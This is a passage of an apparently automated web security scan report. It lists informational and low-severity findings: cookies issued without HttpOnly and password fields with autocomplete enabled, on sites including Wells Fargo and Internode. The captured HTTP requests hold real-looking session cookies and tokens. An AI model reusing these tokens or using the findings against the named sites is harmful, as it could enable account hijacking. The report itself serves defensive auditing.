Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29504
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...

8.33. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /torprojectstore/T-Shirt/_p_4740139 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 178354

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...

8.34. http://www.rockhall.co.uk/10.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /10.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 19 Jul 2011 02:00:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Location: hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html
Content-type: text/html
Content-Length: 0


8.35. http://www.rockhall.co.uk/ContactStyles

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactStyles HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.36. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/goontwcn-webfont.woff

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/templates/rockhall/fonts/goontwcn-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.37. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/templates/rockhall/fonts/gotwtw__-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.38. http://www.rockhall.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.39. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Date: Tue, 19 Jul 2011 02:00:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Vary: Accept-Encoding
Content-Length: 9530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Obsolete IT equipme
...[SNIP]...

8.40. https://www.wellsfargo.com/tas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 206
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER

pageURL=https%3A//www.wellsfargo.com/&ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&pageID=per_home&tz=-300&r=&App_ID=WWW&RequestType=ContentR
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:02 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:02 GMT;Path=/;Secure
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:02 GMT;Path=/
Content-Length: 1575

/*[{"href":"https://adfarm.mediaplex.com/ad/ck/10918-69547-3408-26","contentId":"WF_CON_HP_PRIMARY_BNR","src":"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/ads/tas/consumer/primary/
...[SNIP]...

9. Password field with autocomplete enabled
There are 7 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


9.1. https://secure2.internode.on.net/nodestore/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /nodestore/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 19 Jul 2011 10:11:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /nodestore/products/residential
Vary: Accept-Encoding
Content-Length: 6997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
</h3>
   <form id="restore_cart" enctype="application/x-www-form-urlencoded" method="post" accept-charset="UTF-8" action="/nodestore/cart/restore">


<input class="button" type="submit" id="continue" accesskey="n" name="direction" value="go" title="Next"/>
...[SNIP]...
</label> <input type="password" name="password" id="password" value="" helper="formPassword" class="password">        <div id="password_hint" class="hint" style="display: none">
...[SNIP]...

9.2. https://secure2.internode.on.net/nodestore/checkout/customer/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/checkout/customer/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /nodestore/checkout/customer/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 24416
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>Welcome :: NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, p
...[SNIP]...
</h3>
   <form id="restore_cart" enctype="application/x-www-form-urlencoded" method="post" accept-charset="UTF-8" action="/nodestore/cart/restore">


<input class="button" type="submit" id="continue" accesskey="n" name="direction" value="go" title="Next"/>
...[SNIP]...
</label> <input type="password" name="password" id="password" value="" helper="formPassword" class="password">        <div id="password_hint" class="hint" style="display: none">
...[SNIP]...

9.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
Referer: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; WFsignonCookie=

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:29 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</script>

<form method="post" name="formlogin" id="formlogin" action="">
<input type="hidden" name="REALM" value="CEO Home" />
...[SNIP]...
<br /><input class="signon" type="password" name="PASSWORD" size="8" accesskey="p" id="password" tabindex="3" /></div>
...[SNIP]...

9.4. https://wfefs.wellsfargo.com/boa/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /boa/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /boa/ HTTP/1.1
Host: wfefs.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:58:14 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-Cache
Pragma: No-Cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 5123


<html>
   <head>
       <meta http-equiv="Content-Type"
           content="text/html; charset=iso-8859-1">
       <title>Borrower Online Access</title>
       <link rel="stylesheet" href="common/style.css" t
...[SNIP]...
</div>

           
       <form name="loginForm" method="post" action="/boa/login.do">
   <table cellpadding="2" cellspacing="2" border="0">
...[SNIP]...
<td align="left">
               <input type="password" name="value(password)" accesskey="P" tabindex="2" value="" id="password">
           </td>
...[SNIP]...

9.5. https://wfefs.wellsfargo.com/eoa/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /eoa/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /eoa/ HTTP/1.1
Host: wfefs.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:58:18 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-Cache
Pragma: No-Cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 7704


<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Educational Online Access</title>
   <link rel="stylesheet" href="/eoa/common/
...[SNIP]...
<body>

<form name="loginForm" method="POST" action="/eoa/loginUser.efs"><div>
...[SNIP]...
<td align="left"><input type="password" name="value(password)" tabindex="2" value=""></td>
...[SNIP]...

9.6. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
